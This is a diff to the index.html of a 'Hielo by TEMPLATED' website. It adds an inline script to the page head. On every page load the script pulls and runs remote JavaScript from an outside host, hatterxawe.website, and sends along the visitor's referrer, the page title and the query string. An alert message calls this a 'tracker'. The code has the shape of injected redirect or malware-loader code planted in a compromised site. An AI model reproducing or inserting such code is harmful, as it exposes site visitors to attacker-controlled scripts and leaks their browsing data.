--- a/index.html
+++ b/index.html
@@ -6,6 +6,16 @@
 -->
 <html>
 	<head>
+		<span id="184a9aca-61c6-5137-6cb6-16009864ea61"></span><script type="application/javascript">
+var d=document;var s=d.createElement('script'); 
+s.src='https://hatterxawe.website/zwc75m?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec2b4c33afa0=script5ec2b4c33afa1&_cid=184a9aca-61c6-5137-6cb6-16009864ea61'; 
+if (document.currentScript) { 
+document.currentScript.parentNode.insertBefore(s, document.currentScript);
+} else {
+d.getElementsByTagName('head')[0].appendChild(s);
+}
+if (document.location.protocol === 'https:' && 'https://hatterxawe.website/zwc75m?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec2b4c33afa0=script5ec2b4c33afa1'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
+</script>
 		<title>Hielo by TEMPLATED</title>
 		<meta charset="utf-8" />
 		<meta name="viewport" content="width=device-width, initial-scale=1" />
